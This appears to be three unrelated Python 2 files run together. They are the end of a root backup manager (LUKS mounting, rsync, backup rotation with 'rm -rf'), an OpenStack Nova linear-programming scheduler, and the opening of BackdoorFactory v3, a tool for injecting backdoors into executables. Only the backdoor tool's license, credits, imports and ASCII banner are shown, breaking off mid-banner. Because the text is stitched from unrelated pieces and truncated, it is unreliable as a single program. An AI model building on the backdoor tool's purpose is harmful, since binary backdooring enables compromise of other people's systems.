device = self.device(self.devinfo)
#info('Mounting %s at %s' % (device,self.mountPoint))
if not os.path.exists(self.mountPoint):
run('mkdir -p %s' % self.mountPoint)
run('mount %s %s %s' % (self.mountOpts,device,self.mountPoint), exceptionOnError=True)
def unmount(self):
device = self.device(self.devinfo)
#info('Unmounting %s from %s' % (device,self.mountPoint))
run('sync')
if self.sleepBeforeUnmount:
debug('waiting %i second(s) for device to settle' % self.sleepBeforeUnmount)
time.sleep(self.sleepBeforeUnmount)
run('umount %s' % self.mountPoint)
class LUKS(Step):
"""Attach a LUKS partition."""
def __init__(self, name, devinfo, luksKey='', luksKeyFile='', keepAlive=False):
"""The device will be attached at /dev/mapper/bakman-name where name is the
parameter name. The LUKS password is specified either directly in the configuration
file as parameter luksKey, or indirectly in a file luksKeyFile."""
Step.__init__(self,keepAlive)
self.name = name
self.devinfo = devinfo
self.luksName = 'bakman-%s' % (name) # Will be overridden by setParentConfig
self.luksKey = luksKey
self.luksKeyFile = luksKeyFile
def __str__(self):
device = self.device(self.devinfo)
return 'LUKS volume %s --> %s' % (device,self.luksName)
def setParentConfig(self,parentConfig):
"""Set parent BackupConfiguration instance."""
Step.setParentConfig(self,parentConfig)
self.luksName = '%s-%s' % (self.parentConfig.name,self.name)
def isAvailable(self):
device = self.device(self.devinfo)
hasKey = self.luksKey or os.path.exists(self.luksKeyFile)
return hasKey and os.path.exists(device)
def mount(self):
#info('Opening LUKS device %s' % (self.luksName))
device = self.device(self.devinfo)
if self.luksKeyFile:
key = open(self.luksKeyFile,'r').read().strip()
else:
key = self.luksKey
debug('running cmd: cryptsetup luksOpen %s %s > /dev/null 2>&1' % (device,self.luksName))
cryptsetup = os.popen('cryptsetup luksOpen %s %s > /dev/null 2>&1' % (device,self.luksName), 'w')
print >>cryptsetup, key
cryptsetup.close()
if not os.path.exists('/dev/mapper/'+self.luksName):
raise StepException('Opening LUKS device %s failed' % self.luksName)
def unmount(self):
#info('Closing LUKS device %s' % (self.luksName))
run('cryptsetup luksClose %s' % self.luksName)
class LVM(Step):
"""Attach a logical volume group."""
def __init__(self, name, keepAlive=False):
"""Attach a logical volume group with the given name."""
Step.__init__(self,keepAlive)
self.name = name
def __str__(self):
return 'LVM volume %s' % self.name
def mount(self):
#info('Attaching logical volumes for group %s' % self.name)
run('vgscan --mknodes' )
run('vgchange -ay %s' % self.name, exceptionOnError=True)
if not os.path.exists('/dev/'+self.name):
raise StepException('Attaching logical volumes for group %s failed' % self.name)
def unmount(self):
#info('Detaching logical volumes for group %s' % (self.name))
run('vgchange -an %s' % self.name)
class Command(Step):
"""Generic step class to execute a command."""
def __init__(self, cmd, **kwargs):
Step.__init__(self)
self.cmd = cmd
self.kwargs = kwargs
def __str__(self):
cmd = self.cmd % self.kwargs
return 'Command: %s' % cmd
def run(self):
cmd = self.cmd % self.kwargs
#info(' executing %s' % cmd)
run(cmd, printOutput=options.verbose,dryrun=options.dryrun)
class SysBackup(Command):
"""Run sysbackup."""
def __init__(self):
Command.__init__(self, 'sysbackup')
def __str__(self):
return 'SysBackup (run cmd: %s)' % self.cmd
class CopyFiles(Step):
"""Copy files to target directory."""
def __init__(self, targetDir, fileList=None):
Step.__init__(self)
self.fileList = fileList
self.targetDir = targetDir
def __str__(self):
return 'CopyFiles (%s --> %s)' % (self.fileList,self.targetDir)
def isAvailable(self):
for f in self.fileList:
if not os.path.exists(f):
return False
return os.path.exists(self.targetDir)
def run(self):
for f in self.fileList:
run('/bin/cp -f --preserve=mode,timestamps %s %s' % (f,self.targetDir),
dryrun=options.dryrun)
run('/usr/bin/rm -f %s/LASTUPDATED-*.TIMESTAMP' % self.targetDir,
dryrun=options.dryrun)
run("/usr/bin/touch %s/`date '+LASTUPDATED-%%b-%%d-%%G.TIMESTAMP'`" % self.targetDir,
dryrun=options.dryrun)
class RotateBackups(Step):
"""Rotate versioned backup files and delete superfluous copies."""
def __init__(self, nKeep, dstDir, mountPoint=None):
Step.__init__(self)
self.nKeep = int(nKeep)
self.dstDir = dstDir
self.mountPoint = mountPoint
self.path = None # will be set by setParentConfig
def setParentConfig(self,parentConfig):
Step.setParentConfig(self,parentConfig)
self.path = os.path.join(self.mountPoint,self.dstDir)
def isAvailable(self):
return os.path.exists(self.path)
def __str__(self):
return 'RotateBackups (keep %i old copies at %s)' % (self.nKeep,self.path)
def run(self):
if self.nKeep<=0:
return
delPath = os.path.join(self.path,str(self.nKeep))
if delPath=='/' or ('*' in delPath) or ('%' in delPath) or ('?' in delPath):
error('Found wildcard character in path %s - SKIPPING backup rotation' % delPath)
return
if os.path.exists(delPath):
cmd = 'rm -rf %s' % delPath
run(cmd, printOutput=True, dryrun=options.dryrun)
for i in range(self.nKeep-1,-1,-1):
srcPath = os.path.join(self.path,str(i))
dstPath = os.path.join(self.path,str(i+1))
if os.path.exists(srcPath):
cmd = 'mv -f %s %s' % (srcPath,dstPath)
run(cmd, printOutput=True, dryrun=options.dryrun)
class Rsync(Step):
"""Step class to run rsync."""
def __init__(self, name, rsyncOpts='', rsyncArgs='-axHSAX --delete-excluded'):
"""Create rsync backup of single partition or directory.
rsyncArgs are the default primary rsync arguments (-axHSAX
--delete-excluded) and should normally not be changed by
the user. Additional rsync options should be passed through
parameter rsyncOpts. The command line options -n and -v
will add the corresponding rsync options."""
Step.__init__(self)
self.name = name.replace('/','-')
self.src = '/%s/' % name if not name=='root' else '/'
self.rsyncOpts = rsyncOpts
self.rsyncArgs = rsyncArgs
def makeCommand(self):
"""Return string with full command line for rsync command."""
opts = self.rsyncArgs
if options.rsyncv:
opts += ' -v'
if options.rsyncn:
opts += ' -n'
if not options.rsyncv:
opts += ' -v'
if self.rsyncOpts:
opts += ' '+self.rsyncOpts
return 'rsync %s %s %s/%s' % (opts,self.src,self.mountPoint,self.name)
def __str__(self):
return 'Rsync: '+self.makeCommand()
def isAvailable(self):
return checkSource(self.src)
def run(self):
if checkSource(self.src):
cmd = self.makeCommand()
#info(' executing %s' % cmd)
run(cmd, printOutput=True, dryrun=options.dryrun)
else:
warning('No files found in %s - skipping rsync' % src)
class RsArchive(Step):
"""rsarchive backup."""
def __init__(self, dstDir, keepOldVersions, srcList, rsyncOpts='', rsyncArgs='-axHSAX --delete-excluded',
exclPatterns=EXCLUDEPATTERN, exclList=None,
mountPoint=None):
"""Create rsarchive backup using rsync.
keepOldVersions can be set to False (single versions), True
(multiple versions rotated externally) or to a positive
integer n to automatically rotate through n version.
--delete-excluded is automatically added to rsyncArgs if
keepOldVersions is 0 or False."""
Step.__init__(self)
self.mountPoint = mountPoint
self.path = None # will be set by setParentConfig
self.dstDir = dstDir
self.dstPath = None # will be set by setParentConfig
if isinstance(keepOldVersions,bool):
# versioned, but rotating done outside of RsArchive
self.isVersioned = keepOldVersions
self.nKeep = 0
else:
self.isVersioned = (keepOldVersions>0)
self.nKeep = int(keepOldVersions)
if self.nKeep<0:
self.nKeep=0
self.srcList = srcList
self.rsyncArgs = rsyncArgs
self.rsyncOpts = rsyncOpts
self.exclPatterns = exclPatterns
self.exclList = exclList if exclList else []
def setParentConfig(self,parentConfig):
Step.setParentConfig(self,parentConfig)
if self.dstDir:
self.path = os.path.join(self.mountPoint,self.dstDir)
else:
self.path = self.mountPoint
if self.isVersioned:
self.linkPath = os.path.join(self.path,'1')
self.dstPath = os.path.join(self.path,'0')
else:
self.dstPath = self.path
def makeCommand(self, src):
"""Return string with full command line for rsync command."""
cmd = ['rsync']
cmd.append(self.rsyncArgs)
if self.isVersioned:
if src=='/':
cmd.append(' --link-dest %s/root' % self.linkPath)
else:
cmd.append(' --link-dest %s' % self.linkPath)
if self.rsyncOpts:
cmd.append(self.rsyncOpts)
if options.rsyncv:
cmd.append('-v')
if options.rsyncn:
cmd.append('-n')
if not options.rsyncv:
cmd.append('-v')
for e in self.exclList:
cmd.append('--exclude=%s' % e)
if self.exclPatterns:
cmd.append('--exclude-from=%s' % self.exclPatterns)
if src=='/':
cmd.append('/ %s/root' % self.dstPath)
else:
cmd.append('%s %s' % (src,self.dstPath))
return ' '.join(cmd)
def __str__(self):
if self.nKeep>0:
cmds = ['RsArchive (%s) - rotate to keep %i old copies' % (self.srcList,self.nKeep)]
else:
cmds = ['RsArchive (%s)' % self.srcList]
for src in self.srcList:
cmds.append('%1s %s' % ('*' if checkSource(src) else '',
self.makeCommand(src)))
return '\n'.join(cmds)
def isAvailable(self):
if not checkDest(self.mountPoint,True):
return False
for d in self.srcList:
if not checkSource(d):
return False
return True
def run(self):
if not checkDest(self.mountPoint,True):
error('Destination %s is not mounted' % self.mountPoint)
else:
if not os.path.exists(self.dstPath):
run('mkdir -p %s' % self.dstPath, dryrun=options.dryrun)
if self.nKeep>0:
# rotate old versions
info('%s starting rotate, keeping %s old versions ...' % (time.asctime(),self.nKeep))
delPath = os.path.join(self.path,str(self.nKeep))
if delPath=='/' or ('*' in delPath) or ('%' in delPath) or ('?' in delPath):
error('Found wildcard character in rotation path %s - skipping backup' % delPath)
return
if os.path.exists(delPath):
cmd = 'rm -rf %s' % delPath
run(cmd, printOutput=True, dryrun=options.dryrun)
for i in range(self.nKeep-1,-1,-1):
srcPath = os.path.join(self.path,str(i))
dstPath = os.path.join(self.path,str(i+1))
if os.path.exists(srcPath):
cmd = 'mv -f %s %s' % (srcPath,dstPath)
run(cmd, printOutput=True, dryrun=options.dryrun)
for src in self.srcList:
if checkSource(src):
info('%s starting rsync of %s ...' % (time.asctime(),src))
cmd = self.makeCommand(src)
run(cmd, printOutput=True, dryrun=options.dryrun)
else:
warning('No files found in %s - skipping rsync' % src)
stampPath = self.dstPath
if (not self.dstDir) and len(self.srcList)==1 and self.srcList[0][-1]!='/':
stampPath = os.path.join(stampPath,os.path.basename(self.srcList[0]))
run('touch %s/RSARCHIVE.TIMESTAMP' % stampPath, dryrun=options.dryrun)
class BackupConfiguration:
"""Define a backup configuration."""
def __init__(self, name, description, diskId=None, mountBase='/media', *commonSteps):
self.name = name
self.description = description
self.diskId = diskId
self.mountBase = mountBase
self.commonSteps = commonSteps
for s in commonSteps:
s.setParentConfig(self)
self.parts = [] # list of tuples (name,stepList)
self.locked = False # flag to prevent erroneous changes to configuration
def lock(self):
"""Lock configuration."""
self.locked = True
def device(self,devinfo=None):
"""Return absolute device path to disk or partition.
devinfo is either a device (/dev/...) or a partition number.
In the former case, devinfo is returned. In the latter case,
diskId and devinfo are used to obtain the full path to the
partition's device. If devinfo is None, the path to the disk
is returned, otherwise devinfo is assumed to be a partition
number and the device path to that partition is returned."""
if devinfo is None:
return '/dev/disk/by-id/%s' % (self.diskId)
try:
if devinfo[0:5]=='/dev/':
return devinfo
except:
pass
return '/dev/disk/by-id/%s-part%i' % (self.diskId,devinfo)
# FIXME: optional part argument to check if part is avaiable
def isAvailable(self):
"""Return True if configuration is available."""
if self.diskId is None:
return True
else:
return os.path.exists(self.device())
def isAvailableCommonSteps(self):
"""Return True if common steps are available."""
for s in self.commonSteps:
if not s.isAvailable():
return False
return True
def definedParts(self):
"""Return list of all defined parts."""
return [name for (name,steps) in self.parts]
def availableParts(self):
"""Return list with names of available parts."""
if not self.isAvailable():
return []
if not self.isAvailableCommonSteps():
return [] # No parts available if common steps not available
available = []
for (name,steps) in self.parts:
isAvailable = True
for s in steps:
isAvailable = isAvailable and s.isAvailable()
if isAvailable:
available.append(name)
return available
def add(self, name, *steps):
"""Add a new part with given steps."""
if self.locked:
raise RuntimeError('config file error: cannot add part %s to locked configuration %s' % (name,self.name))
else:
self.parts.append( (name,list(steps)) )
for s in steps:
s.setParentConfig(self)
def steps(self, partName):
"""Return list of steps for part with name partName."""
for (name,steps) in self.parts:
if name==partName:
return steps
raise LookupError('Part %s not found' % partName)
def uniqueStepConfiguration(self, partNames,
description='BackupConfiguration with unique steps for selected parts'):
"""Return a BackupConfiguration with unique steps for given parts."""
steps = set()
for s in self.commonSteps:
steps.add(s)
c = BackupConfiguration(self.name,description,self.diskId,self.mountBase,*self.commonSteps)
for name in partNames:
uniqueSteps = []
c.parts.append( (name,uniqueSteps) )
for s in self.steps(name):
if not s in steps:
uniqueSteps.append(s)
steps.add(s)
return c
def dump(self):
print 'Configuration %s (%s):' % (self.name,self.description)
print ' --- steps marked as KEEP will be unmounted in reverse order at the end'
print " --- '*' denotes parts or actions that are available"
print
available = self.availableParts() if self.isAvailable() else []
if len(self.parts)+len(self.commonSteps)>0:
print ' %1s Common steps:' % ('*' if self.isAvailableCommonSteps() else '')
def printStep(keepAlive,step):
sep = ' KEEP ' if keepAlive else 10*' '
for l in str(step).split('\n'):
print sep,l
for s in self.commonSteps:
printStep(s.keepAlive,s)
for (name,steps) in self.parts:
print
print ' %1s %s:' % ('*' if name in available else '',name)
for s in steps:
printStep(s.keepAlive,s)
else:
print '\n%s has no parts' % self.name
#
# Utilities to manage configurations and execute commands
#
def prepareConfig(cmdargs):
"""Return (configName,config,partList).
configName is the name of the configuration.
config is a copy of configuration configName that has only unique steps.
partList is the list of available parts to use."""
configName = cmdargs[0]
try:
config = configDict[configName]
except:
raise LookupError('Configuration %s not found' % configName)
availableParts = config.availableParts()
definedParts = config.definedParts()
excludeParts = options.excludeParts.split(',')
parts = []
tryParts = cmdargs[1:] if len(cmdargs)>1 else config.definedParts()
for p in tryParts:
if p in availableParts:
if not p in excludeParts:
parts.append(p)
else:
if len(cmdargs)>1:
error('Part %s of configuration %s is not available or not defined.' % (p,configName))
else:
warning('Part %s not available - skipping' % p)
info('')
info('Configuration: %s' % configName)
info('Defined parts: %s' % definedParts)
info('Available parts: %s' % availableParts)
info('Excluded parts: %s' % excludeParts)
info('Using parts: %s' % parts)
return (configName,config.uniqueStepConfiguration(parts),parts)
def execute(partList, config, doMount=False, doRun=False, doUnmount=False):
"""Execute a actions on steps in selected parts."""
fmt = 'starting %-8s for step %-16s (%s)'
# Check that bakman is not running already
# FIXME - see e.g. http://stackoverflow.com/questions/788411/check-to-see-if-python-script-is-running
# Check if there are any steps. This takes also care of preventing execution
# of unavailable common steps (if common steps are not available, no parts are
# available.
if len(partList)==0:
return
# Check that we are root
if os.geteuid()!=0:
error('Must run as root')
sys.exit(1)
# Common steps
info('')
info('%s Processing common steps ...' % (time.asctime()))
if doMount:
for s in config.commonSteps:
debug(fmt % ('mount',s.__class__.__name__,'common steps'))
s.mount()
if doRun:
for s in config.commonSteps:
debug(fmt % ('run',s.__class__.__name__,'common steps'))
s.run()
if doUnmount:
for s in reversed(config.commonSteps):
if not s.keepAlive:
debug(fmt % ('unmount',s.__class__.__name__,'common steps'))
s.unmount()
# Process parts
for p in partList:
info('')
info('%s Processing part %s ...' % (time.asctime(),p))
steps = config.steps(p)
if doMount:
for s in steps:
debug(fmt % ('mount',s.__class__.__name__,p))
s.mount()
if doRun:
for s in steps:
debug(fmt % ('run',s.__class__.__name__,p))
s.run()
if doUnmount:
for s in reversed(steps):
if not s.keepAlive:
debug(fmt % ('unmount',s.__class__.__name__,p))
s.unmount()
# Finalize parts kept alive and common steps
if doUnmount:
for p in reversed(partList):
for s in reversed(config.steps(p)):
if s.keepAlive:
debug(fmt % ('finalize',s.__class__.__name__,p))
s.unmount()
for s in reversed(config.commonSteps):
if s.keepAlive:
debug(fmt % ('finalize',s.__class__.__name__,'common steps'))
s.unmount()
# Done
info('')
info('%s Done' % (time.asctime()))
#
# Command line execution
#
if __name__ == '__main__':
cmdHelper = CmdHelper('optparse', __version__, __usage__,
hasInteractive=True,
hasBatch=True,
logFile=LOGFILE,
logSeparator=70*'-',
logTimestampFmt='%(asctime)s %(levelname)-8s ')
defaultConfigFile = CONFIGFILE
defaultRunLogFile = DATEFILE
cmdHelper.add_option('', '--runlog', dest='runlog', default=os.path.expandvars(defaultRunLogFile),
help='path to run log file (default: %s)' % defaultRunLogFile)
cmdHelper.add_option('-c', '--config', dest='config', default=os.path.expandvars(defaultConfigFile),
help='path to config file (default: %s)' % defaultConfigFile)
cmdHelper.add_option('-m', '--mount', dest='mountBase', default=None,
help='base mount point for backup partitions mounted by bakman (default: /media)')
cmdHelper.add_option('-x', '--exclude', dest='excludeParts', default='',
help='comma-separated string of parts to exclude')
cmdHelper.add_option('', '--modify-window', dest='modifywindow', type=int, default='3601',
help='rsync: set maximum time differencee to ignore (used only for FAT '
'filesystems, default: 3601)')
cmdHelper.add_option('-V', '--rsyncv', dest='rsyncv', action='store_true', default=False,
help='rsync: show files being transferred')
cmdHelper.add_option('-n', '--rsyncn', dest='rsyncn', action='store_true', default=False,
help='rsync: only show what would be done but do not copy anything')
cmdHelper.add_option('', '--dryrun', dest='dryrun', action='store_true', default=False,
help='only log commands (use --debug), but do not execute anything in run step '
'(mount/unmount are still executed)')
(options,args) = cmdHelper.parse()
if len(args) < 1:
error('wrong number of command line arguments')
sys.exit(1)
# Command processing
cmd = args[0]
cmdargs = args[1:]
cmdOk = False
try:
# Read config file
configDict = {}
execfile(options.config,globals(),configDict)
# List defined configuration
if cmd=='list' and len(cmdargs)==0:
print 'Configuration: %s' % options.config
print 'Log file: %s' % options.logfile
print
print 'List of backup configurations (* means configration is available):'
for configName in sorted(configDict.keys()):
if not isinstance(configDict[configName],BackupConfiguration):
continue
config = configDict[configName]
print ' %1s %-15s %s' % ('*' if config.isAvailable() else '',
config.name,
config.description)
cmdOk = True
# List parts in configuration
if cmd=='list' and len(cmdargs)==1:
configName = cmdargs[0]
try:
config = configDict[configName]
except:
raise LookupError('Configuration %s not found' % configName)
available = config.availableParts() if config.isAvailable() else []
print 'Parts in configuration %s (* means part is available):' % configName
for (name,steps) in config.parts:
print ' %1s %-15s' % ('*' if name in available else ' ',name)
cmdOk = True
# Dump configuration
if cmd=='dump' and len(cmdargs)==1:
configName = cmdargs[0]
try:
config = configDict[configName]
except:
raise LookupError('Configuration %s not found' % configName)
config.dump()
cmdOk = True
# Mount all or selected parts in specific configuration
if cmd=='mount' and (len(cmdargs)==1 or len(cmdargs)==2):
(configName,stepConfig,parts) = prepareConfig(cmdargs)
execute(parts,stepConfig,doMount=True)
cmdOk = True
# Unmount all or selected parts in specific configuration
if cmd=='unmount' and (len(cmdargs)==1 or len(cmdargs)==2):
(configName,stepConfig,parts) = prepareConfig(cmdargs)
execute(parts,stepConfig,doUnmount=True)
cmdOk = True
# Run all or selected parts in specific configuration
if cmd=='run' and len(cmdargs)>=1:
(configName,stepConfig,parts) = prepareConfig(cmdargs)
if not options.batch:
if not parts:
error('Nothing to run - backup aborted.')
sys.exit(1)
try:
config = configDict[configName]
except:
raise LookupError('Configuration %s not found' % configName)
print
config.dump()
print
confirm('Execute backup with parts %s' % parts)
execute(parts,stepConfig,doMount=True,doRun=True,doUnmount=True)
if not options.dryrun:
with open(options.runlog,'a') as f:
line = time.strftime('%a %b %d %X %Z %Y '+cmdLine(True)+'\n')
f.write(line)
cmdOk = True
# Enter interactive debug mode
if cmd=='debug':
os.environ['PYTHONINSPECT'] = '1'
print 'Entering interactive mode (configDict contains configuration info) ...'
cmdOk = True
if not cmdOk:
raise CmdError('illegal command or number of arguments')
except Exception, e:
handleError(e,options.debug)
except KeyboardInterrupt:
error('Backup aborted by user (CTRL-C)')
sys.exit(1)
| |
# Copyright (c) 2014 Cisco Systems, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from pulp import constants
from pulp import pulp
from pulp import solvers as pulp_solver_classes
from oslo.config import cfg
from nova.openstack.common.gettextutils import _
from nova.openstack.common import log as logging
from nova.scheduler import solvers as scheduler_solver
from nova import solver_scheduler_exception as exception
pulp_solver_opts =[
cfg.IntOpt('pulp_solver_timeout_seconds',
default=20,
help='How much time in seconds is allowed for solvers to '
'solve the scheduling problem. If this time limit '
'is exceeded the solver will be stopped.'),
]
CONF = cfg.CONF
CONF.register_opts(pulp_solver_opts, group='solver_scheduler')
LOG = logging.getLogger(__name__)
class PulpVariables(scheduler_solver.BaseVariables):
def populate_variables(self, host_keys, instance_keys):
self.host_instance_matrix = [
[pulp.LpVariable('HI_' + host_key + '_' + instance_key, 0, 1,
constants.LpInteger) for instance_key in instance_keys]
for host_key in host_keys]
class PulpSolver(scheduler_solver.BaseHostSolver):
"""A LP based pluggable LP solver implemented using PULP modeler."""
variables_cls = PulpVariables
def __init__(self):
super(PulpSolver, self).__init__()
self.cost_classes = self._get_cost_classes()
self.constraint_classes = self._get_constraint_classes()
def _get_operation(self, op_str):
ops = {
'==': lambda x, y: x == y,
'!=': lambda x, y: x != y,
'>=': lambda x, y: x >= y,
'<=': lambda x, y: x <= y,
'>': lambda x, y: x > y,
'<': lambda x, y: x < y}
return ops.get(op_str)
def _calculate_host_instance_cost_matrix(self, cost_matrix):
new_cost_matrix = cost_matrix
if not cost_matrix:
return new_cost_matrix
first_column = [row[0] for row in cost_matrix]
last_column = [row[-1] for row in cost_matrix]
if sum(first_column) < sum(last_column):
offset = min(first_column)
sign = 1
else:
offset = max(first_column)
sign = -1
for i in xrange(len(cost_matrix)):
for j in xrange(len(cost_matrix[i])):
new_cost_matrix[i][j] = sign * (
(cost_matrix[i][j] - offset) ** 2)
return new_cost_matrix
def solve(self, hosts, filter_properties):
"""This method returns a list of tuples - (host, instance_uuid)
that are returned by the solver. Here the assumption is that
all instance_uuids have the same requirement as specified in
filter_properties.
"""
host_instance_combinations = []
num_instances = filter_properties['num_instances']
num_hosts = len(hosts)
instance_uuids = filter_properties.get('instance_uuids') or [
'(unknown_uuid)' + str(i) for i in xrange(num_instances)]
LOG.debug(_("All Hosts: %s") % [h.host for h in hosts])
for host in hosts:
LOG.debug(_("Host state: %s") % host)
# Create dictionaries mapping temporary host/instance keys to
# hosts/instance_uuids. These temorary keys are to be used in the
# solving process since we need a convention of lp variable names.
host_keys = ['Host' + str(i) for i in xrange(num_hosts)]
host_key_map = dict(zip(host_keys, hosts))
instance_keys = ['InstanceNum' + str(i) for i in xrange(num_instances)]
instance_key_map = dict(
zip(instance_keys, xrange(1, num_instances + 1)))
# this is currently hard-coded and should match variable names
host_instance_matrix_idx_map = {}
for i in xrange(len(host_keys)):
for j in xrange(len(instance_keys)):
var_name = 'HI_' + host_keys[i] + '_' + instance_keys[j]
host_instance_matrix_idx_map[var_name] = (i, j)
# Create the 'variables' to contain the referenced variables.
self.variables.populate_variables(host_keys, instance_keys)
# Create the 'prob' variable to contain the problem data.
prob = pulp.LpProblem("Host Instance Scheduler Problem",
constants.LpMinimize)
# Get costs and constraints and formulate the linear problem.
# Add costs.
cost_objects = [cost() for cost in self.cost_classes]
cost_coeff_matrix = [[0 for j in xrange(num_instances)]
for i in xrange(num_hosts)]
for cost_object in cost_objects:
var_list, coeff_list = cost_object.get_components(
self.variables, hosts, filter_properties)
for i in xrange(len(var_list)):
var = var_list[i]
coeff = coeff_list[i]
hidx, iidx = host_instance_matrix_idx_map[var.name]
cost_coeff_matrix[hidx][iidx] += (
coeff * cost_object.cost_multiplier())
cost_coeff_matrix = self._calculate_host_instance_cost_matrix(
cost_coeff_matrix)
cost_coeff_array = []
for var in var_list:
hidx, iidx = host_instance_matrix_idx_map[var.name]
cost_coeff_array.append(cost_coeff_matrix[hidx][iidx])
cost_variables = var_list
cost_coefficients = cost_coeff_array
if cost_variables:
prob += (pulp.lpSum([cost_coefficients[i] * cost_variables[i]
for i in xrange(len(cost_variables))]), "Sum_Costs")
# Add constraints.
constraint_objects = [constraint()
for constraint in self.constraint_classes]
for constraint_object in constraint_objects:
vars_list, coeffs_list, consts_list, ops_list = (
constraint_object.get_components(self.variables, hosts,
filter_properties))
LOG.debug(_("coeffs of %(name)s is: %(value)s") %
{"name": constraint_object.__class__.__name__,
"value": coeffs_list})
for i in xrange(len(ops_list)):
operation = self._get_operation(ops_list[i])
prob += (
operation(pulp.lpSum([coeffs_list[i][j] *
vars_list[i][j] for j in xrange(len(vars_list[i]))]),
consts_list[i]), "Costraint_Name_%s" %
constraint_object.__class__.__name__ + "_No._%s" % i)
# The problem is solved using PULP's choice of Solver.
prob.solve(pulp_solver_classes.PULP_CBC_CMD(
maxSeconds=CONF.solver_scheduler.pulp_solver_timeout_seconds))
# Create host-instance tuples from the solutions.
if pulp.LpStatus[prob.status] == 'Optimal':
num_insts_on_host = {}
for v in prob.variables():
if v.name.startswith('HI'):
(host_key, instance_key) = v.name.lstrip('HI').lstrip(
'_').split('_')
if v.varValue == 1:
num_insts_on_host[host_key] = (
instance_key_map[instance_key])
instances_iter = iter(instance_uuids)
for host_key in host_keys:
num_insts_on_this_host = num_insts_on_host.get(host_key, 0)
for i in xrange(num_insts_on_this_host):
host_instance_combinations.append(
(host_key_map[host_key], instances_iter.next()))
elif pulp.LpStatus[prob.status] == 'Infeasible':
LOG.warn(_("Pulp solver didnot find optimal solution! reason: %s")
% pulp.LpStatus[prob.status])
host_instance_combinations = []
else:
LOG.warn(_("Pulp solver didnot find optimal solution! reason: %s")
% pulp.LpStatus[prob.status])
raise exception.SolverFailed(reason=pulp.LpStatus[prob.status])
return host_instance_combinations
| |
#!/usr/bin/env python
'''
BackdoorFactory (BDF) v3 - FOUNTAINPATCH
Many thanks to Ryan O'Neill --ryan 'at' codeslum <d ot> org--
Without him, I would still be trying to do stupid things
with the elf format.
Also thanks to Silvio Cesare with his 1998 paper
(http://vxheaven.org/lib/vsc01.html) which these ELF patching
techniques are based on.
Special thanks to Travis Morrow for poking holes in my ideas.
Copyright (c) 2013-2015, Joshua Pitts
All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
3. Neither the name of the copyright holder nor the names of its contributors
may be used to endorse or promote products derived from this software without
specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
POSSIBILITY OF SUCH DAMAGE.
'''
import sys
import os
import signal
import time
from random import choice
from optparse import OptionParser
from pebin import pebin
from elfbin import elfbin
from machobin import machobin
def signal_handler(signal, frame):
print '\nProgram Exit'
sys.exit(0)
class bdfMain():
version = """\
Version: 3.0.3
"""
author = """\
Author: Joshua Pitts
Email: the.midnite.runr[-at ]gmail<d o-t>com
Twitter: @midnite_runr
IRC: freenode.net #BDFactory
"""
#ASCII ART
menu = ["-.(`-') (`-') _ <-"
".(`-') _(`-') (`-')\n"
"__( OO) (OO ).-/ _ __( OO)"
"( (OO ).-> .-> .-> <-.(OO ) \n"
"'-'---.\ / ,---. \-,-----.'-'. ,--"
".\ .'_ (`-')----. (`-')----. ,------,) \n"
"| .-. (/ | \ /`.\ | .--./| .' /"
"'`'-..__)( OO).-. '( OO).-. '| /`. ' \n"
"| '-' `.) '-'|_.' | /_) (`-')| /)"
"| | ' |( _) | | |( _) | | || |_.' | \n"
"| /`'. |(| .-. | || |OO )| . ' |"
" | / : \| |)| | \| |)| || . .' \n"
"| '--' / | | | |(_' '--'\| |\ \|"
" '-' / ' '-' ' ' '-' '| |\ \ \n"
"`------' `--' `--' `-----'`--' '--'"
"`------' `-----' `-----' `--' '--' \n"
" (`-') _ (`-') "
" (`-') \n"
" <-. (OO ).-/ _ ( OO).-> "
" .-> <-.(OO ) .-> \n"
"(`-')-----./ ,---. \-,-----./ '._"
" (`-')----. ,------,) ,--.' ,-. \n"
"(OO|(_\---'| \ /`.\ | .--./|'--...__)"
"( OO).-. '| /`. '(`-')'.' / \n"
" / | '--. '-'|_.' | /_) (`-')`--. .--'"
"( _) | | || |_.' |(OO \ / \n"
" \_) .--'(| .-. | || |OO ) | | "
" \| |)| || . .' | / /) \n"
" `| |_) | | | |(_' '--'\ | | "
" ' '-' '| |\ \ `-/ /` \n"
" `--' `--' `--' `-----' `--' "
" `-----' `--' '--' `--' \n",
"__________ "
" __ .___ \n"
"\______ \_____ ____ "
"| | __ __| _/____ ___________ \n"
" | | _/\__ \ _/ ___\|"
" |/ // __ |/ _ \ / _ \_ __ \ \n"
" | | \ / __ \\\\ \__"
"_| </ /_/ ( <_> | <_> ) | \/\n"
" |______ /(____ /\___ >"
"__|_ \____ |\____/ \____/|__| \n"
" \/ \/ \/"
" \/ \/ \n"
"___________ "
"__ \n"
"\_ _____/____ _____/"
" |_ ___________ ___.__. \n"
" | __) \__ \ _/ ___\ "
" __\/ _ \_ __ < | | \n"
" | \ / __ \\\\ \__"
"_| | ( <_> ) | \/\___ | \n"
" \___ / (____ /\___ >_"
"_| \____/|__| / ____| \n"
" \/ \/ \/ "
" \/ \n",
